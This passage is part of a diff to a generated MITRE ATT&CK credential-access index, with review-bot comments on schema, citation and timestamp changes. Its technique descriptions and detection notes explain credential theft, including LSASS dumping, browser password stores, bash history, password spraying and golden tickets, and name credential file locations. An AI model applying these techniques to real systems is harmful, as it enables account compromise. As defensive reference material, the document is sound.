may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
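Review bot: the two trailing context lines `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref: ...` that git matched as unchanged used to close T1552 and now close the newly inserted T1557.004 object; that only works because T1552 re-gains both keys earlier in its own block in other hunks of this diff, so confirm T1552 ends up with each key exactly once and that the Evil Twin object is complete. Like T1558.005, the new T1557.004 block has no `identifier:` key even though the line immediately above it adds `identifier: T1552`, so either add `identifier: T1557.004` before its `atomic_tests: []` or document why new sub-techniques omit it. Its `x_mitre_detection: ''` is empty, and the description text "the adversary may able to monitor" is missing "be"; both come from upstream ATT&CK, so fix them there rather than hand-editing a generated index.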
@@ -44883,9 +45653,9 @@ credential-access:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
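Review bot: the prose rename from Azure AD to Entra ID in the T1556.007 description leaves citation keys such as `(Citation: Mandiant Azure AD Backdoors)` and `(Citation: Azure AD Hybrid Identity)` untouched, which is correct because each key must match the corresponding `source_name` exactly; a follow-up that "modernizes" those keys without also renaming the reference entries would break citation resolution.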
@@ -44894,21 +45664,22 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
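Review bot: the same platform consolidation applied to T1552 is applied to T1556.007 here (`Azure AD`, `Google Workspace`, `Office 365` replaced by `Office Suite` and `Identity Provider`, version 1.0 to 1.1), and the remaining lines are a key reorder with `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` moved up into this part of the object; a later hunk deletes the old copies of those two keys from the tail of T1556.007, so the net effect is a move, not a removal.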
@@ -44948,55 +45719,10 @@ credential-access:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Ryan Benson, Exabeam
- - Barry Shteiman, Exabeam
- - Sylvain Gil, Exabeam
- - RedHuntLabs, @redhuntlabs
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
- type: attack-pattern
- created: '2020-02-12T18:57:36.041Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1555.003
- url: https://attack.mitre.org/techniques/T1555/003
- - source_name: Talos Olympic Destroyer 2018
- url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
- description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
- Takes Aim At Winter Olympics. Retrieved March 14, 2019.
- - source_name: Microsoft CryptUnprotectData April 2018
- url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
- description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
- June 18, 2019.
- - source_name: Proofpoint Vega Credential Stealer May 2018
- url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
- description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
- in targeted campaign . Retrieved June 18, 2019.
- - source_name: FireEye HawkEye Malware July 2017
- url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
- description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
- Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
- 2019.
- - source_name: GitHub Mimikittenz July 2016
- url: https://github.com/putterpanda/mimikittenz
- description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
- Retrieved June 20, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-15T14:13:45.294Z'
name: 'Credentials from Password Stores: Credentials from Web Browsers'
description: "Adversaries may acquire credentials from web browsers by reading
files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
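Review bot: this hunk deletes a large block of T1555.003 metadata (platforms, domains, contributors, marking, id, type, created, created_by_ref and all external references) and the trailing `x_mitre_attack_spec_version: 2.1.0` / `x_mitre_modified_by_ref` / `spec_version` keys of T1556.007; every T1555.003 key removed here is re-added in the two hunks that follow, and T1556.007's two surviving keys were re-added earlier in the object, so the only real removals are `spec_version: '2.1'` and the `modified` date bump. Reviewers should still diff the two reference lists side by side, since a regenerated list is where a dropped entry would go unnoticed.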
@@ -45026,6 +45752,12 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Ryan Benson, Exabeam
+ - Barry Shteiman, Exabeam
+ - Sylvain Gil, Exabeam
+ - RedHuntLabs, @redhuntlabs
+ x_mitre_deprecated: false
x_mitre_detection: 'Identify web browser files that contain credentials such
as Google Chrome’s Login Data database file: AppData\Local\Google\Chrome\User
Data\Default\Login Data
. Monitor file read events of web browser files
@@ -45035,23 +45767,58 @@ credential-access:
reading web browser process memory, utilizing regular expressions, and those
that contain numerous keywords for common web applications (Gmail, Twitter,
Office365, etc.).'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Access'
- 'File: File Access'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
+ created: '2020-02-12T18:57:36.041Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1555/003
+ external_id: T1555.003
+ - source_name: GitHub Mimikittenz July 2016
+ description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
+ Retrieved June 20, 2019.
+ url: https://github.com/putterpanda/mimikittenz
+ - source_name: Talos Olympic Destroyer 2018
+ description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+ Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+ url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+ - source_name: Microsoft CryptUnprotectData April 2018
+ description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
+ June 18, 2019.
+ url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
+ - source_name: Proofpoint Vega Credential Stealer May 2018
+ description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
+ in targeted campaign . Retrieved June 18, 2019.
+ url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
+ - source_name: FireEye HawkEye Malware July 2017
+ description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
+ Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
+ 2019.
+ url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1555.003
atomic_tests: []
T1557.003:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-09-12T19:46:04.759Z'
name: DHCP Spoofing
description: "Adversaries may redirect network traffic to adversary-owned systems
by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
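Review bot: in the re-added T1555.003 block the reference list is reordered (Mimikittenz now first) but still contains the same five non-ATT&CK sources as the removed block (Mimikittenz, Talos Olympic Destroyer, Microsoft CryptUnprotectData, Proofpoint Vega, FireEye HawkEye), so no citation is lost; `revoked: false` is new and `x_mitre_permissions_required:` / `- User` is gone, the same schema change seen for T1558.004. The stray space in "targeted campaign ." in the Proofpoint entry is upstream text and should not be edited in the generated index.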
@@ -45088,23 +45855,23 @@ credential-access:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Alex Spivakovsky, Pentera
+ - Andrew Allen, @whitehat_zero
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
specify that the IP allocations are low or have run out; these EIDs may indicate
a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- Windows
- macOS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Alex Spivakovsky, Pentera
- - Andrew Allen, @whitehat_zero
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
@@ -45137,21 +45904,20 @@ credential-access:
- source_name: solution_monitor_dhcp_scopes
description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
- March 7, 2022.'
- url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+ September 12, 2024.'
+ url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
- source_name: w32.tidserv.g
description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
14, 2022.
url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1552.004:
technique:
- modified: '2023-04-12T23:52:08.194Z'
+ modified: '2024-10-04T11:31:56.622Z'
name: 'Unsecured Credentials: Private Keys'
description: "Adversaries may search for private key certificate files on compromised
systems for insecurely stored credentials. Private cryptographic keys and
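Review bot: `spec_version: '2.1'` is deleted from this technique object (and the same deletion repeats throughout the patch) while `x_mitre_attack_spec_version` moves from 2.1.0 to 3.2.0; the PR description should state that this is the output of regenerating from a newer ATT&CK STIX bundle and that nothing downstream reads the per-object `spec_version`. Swapping the dead lockstepgroup.com link for the web.archive.org snapshot and refreshing the retrieval date is the right fix for that citation.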
@@ -45162,7 +45928,7 @@ credential-access:
as ~/.ssh
for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\
on Windows. Adversary tools may also search compromised systems for file extensions
relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation:
- Palo Alto Prince of Persia)\n\nWhen a device is registered to Azure AD, a
+ Palo Alto Prince of Persia)\n\nWhen a device is registered to Entra ID, a
device key and a transport key are generated and used to verify the device’s
identity.(Citation: Microsoft Primary Refresh Token) An adversary with access
to the device may be able to export the keys in order to impersonate the device.(Citation:
@@ -45196,7 +45962,7 @@ credential-access:
- macOS
- Windows
- Network
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Access'
@@ -45224,7 +45990,7 @@ credential-access:
- source_name: Kaspersky Careto
description: Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The
Masked APT. Retrieved July 5, 2017.
- url: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
+ url: https://web.archive.org/web/20141031134104/http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
- source_name: Microsoft Primary Refresh Token
description: Microsoft. (2022, September 9). What is a Primary Refresh Token?.
Retrieved February 21, 2023.
@@ -45235,14 +46001,13 @@ credential-access:
url: https://en.wikipedia.org/wiki/Public-key_cryptography
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.004
atomic_tests: []
T1557.001:
technique:
- modified: '2023-04-25T14:00:00.188Z'
+ modified: '2022-10-25T15:46:55.393Z'
name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
spoof an authoritative source for name resolution to force communication with
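Review bot: the `modified` timestamp for T1557.001 moves backwards, from 2023-04-25 to 2022-10-25, which is the opposite direction from every other `modified` change in this patch. A regenerated bundle should not produce an older last-modified date, so check that the T1557.001 object was pulled from the intended release rather than a stale source.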
@@ -45350,12 +46115,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1557.001
atomic_tests: []
T1003.001:
technique:
- modified: '2023-12-27T17:57:20.003Z'
+ modified: '2024-08-13T13:52:45.379Z'
name: 'OS Credential Dumping: LSASS Memory'
description: |
Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
@@ -45392,6 +46156,7 @@ credential-access:
- Edward Millington
- Ed Williams, Trustwave, SpiderLabs
- Olaf Hartong, Falcon Force
+ - Michael Forret, Quorum Cyber
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
@@ -45404,7 +46169,7 @@ credential-access:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.4'
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Process: Process Access'
- 'Windows Registry: Windows Registry Key Modification'
@@ -45454,12 +46219,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.001
atomic_tests: []
T1110.003:
technique:
- modified: '2024-03-07T14:33:34.201Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Spraying'
description: |-
Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
@@ -45485,6 +46249,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- John Strand
@@ -45500,18 +46265,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
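Review bot: this hunk replaces the `Azure AD`, `Office 365` and `Google Workspace` platforms on T1110.003 with `Office Suite` and `Identity Provider`. Any artifact keyed on the old platform strings (per-platform indexes or filters) will match nothing for this technique unless it is regenerated with the new names in the same change; worth confirming that is covered.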
@@ -45538,14 +46303,11 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.003
atomic_tests: []
T1056.003:
technique:
- modified: '2023-03-30T21:01:46.711Z'
+ modified: '2024-10-15T16:43:43.849Z'
name: Web Portal Capture
description: |-
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -45556,13 +46318,13 @@ credential-access:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: File monitoring may be used to detect changes to files in
the Web directory for organization login pages that do not match with authorized
updates to the Web server's content.
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -45576,6 +46338,7 @@ credential-access:
id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
created: '2020-02-11T18:59:50.058Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056/003
@@ -45586,12 +46349,12 @@ credential-access:
url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1003.005:
technique:
- modified: '2024-04-18T23:47:54.553Z'
+ modified: '2024-10-15T14:18:59.123Z'
name: 'OS Credential Dumping: Cached Domain Credentials'
description: "Adversaries may attempt to access cached domain credentials used
to allow authentication to occur in the event a domain controller is unavailable.(Citation:
@@ -45666,7 +46429,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.005
atomic_tests: []
T1558.001:
@@ -45712,7 +46474,7 @@ credential-access:
url: https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285
description: Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated).
Retrieved February 27, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-05T16:07:03.779Z'
name: 'Steal or Forge Kerberos Tickets: Golden Ticket'
description: "Adversaries who have the KRBTGT account password hash may forge
Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation:
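Review bot: the `modified` timestamp for T1558.001 regresses from 2022-04-25 to 2020-11-05. Together with `modified` sitting after `external_references` in this object (in the other techniques it is the first key under `technique`), this suggests the T1558.001 entry did not go through the same regeneration as the rest; please confirm which source produced it.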
@@ -45747,16 +46509,14 @@ credential-access:
- 'Logon Session: Logon Session Metadata'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1558.001
atomic_tests: []
T1649:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal or Forge Authentication Certificates
description: |-
- Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
+ Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
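Review bot: `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are both removed from T1558.001 here, and unlike the other techniques in this patch no `x_mitre_attack_spec_version: 3.2.0` line is added anywhere in the hunk, so the object ends up with no ATT&CK spec version at all. Either add the 3.2.0 line or explain why this object is exempt. The T1649 description now reads `Entra ID` while its citation key stays `O365 Blog Azure AD Device IDs`; that is fine as long as the key is an identifier and not rendered text.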
@@ -45766,21 +46526,23 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Tristan Bennett, Seamless Intelligence
+ - Lee Christensen, SpecterOps
+ - Thirumalai Natarajan, Mandiant
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- - Azure AD
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Tristan Bennett, Seamless Intelligence
- - Lee Christensen, SpecterOps
- - Thirumalai Natarajan, Mandiant
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -45829,33 +46591,11 @@ credential-access:
url: https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1649
atomic_tests: []
T1552.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
- type: attack-pattern
- created: '2020-02-04T13:02:11.685Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1552.003
- url: https://attack.mitre.org/techniques/T1552/003
- - url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
- description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- source_name: External to DA, the OS X Way
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-12T15:24:04.912Z'
name: 'Unsecured Credentials: Bash History'
description: 'Adversaries may search the bash command history on compromised
systems for insecurely stored credentials. Bash keeps track of the commands
@@ -45870,25 +46610,43 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: Monitoring when the user's .bash_history
is
read can help alert to suspicious activity. While users do typically rely
on their history of commands, they often access this history through other
utilities like "history" instead of commands like cat ~/.bash_history
.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
+ created: '2020-02-04T13:02:11.685Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1552/003
+ external_id: T1552.003
+ - source_name: External to DA, the OS X Way
+ description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1552.003
atomic_tests: []
T1552.001:
technique:
- modified: '2024-04-15T21:33:00.213Z'
+ modified: '2024-10-15T14:28:43.639Z'
name: 'Unsecured Credentials: Credentials In Files'
description: |-
Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
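Review bot: `x_mitre_permissions_required` with its `User` entry is dropped from T1552.003 with no replacement, and the same field is removed for other sub-techniques further down. If that reflects the field being retired upstream, a line in the PR description would save reviewers a lookup; if any Atomic Red Team tooling still reads `x_mitre_permissions_required`, it needs a fallback. The slideshare URL moves from a user-scoped path to a `/slideshow/.../62021418` path; since the retrieval date is refreshed alongside it, confirm it resolves to the same deck.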
@@ -45962,7 +46720,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.001
atomic_tests: []
T1606.001:
@@ -46024,11 +46781,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1528:
technique:
- modified: '2024-03-24T19:41:54.832Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal Application Access Token
description: "Adversaries can steal application access tokens as a means of
acquiring credentials to access remote systems and resources.\n\nApplication
@@ -46077,6 +46833,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Suzy Schapperle - Microsoft Azure Red Team
- Shailesh Tiwary (Indian Army)
@@ -46085,6 +46842,7 @@ credential-access:
- Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
- Ram Pliskin, Microsoft Azure Security Center
- Jack Burns, HubSpot
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
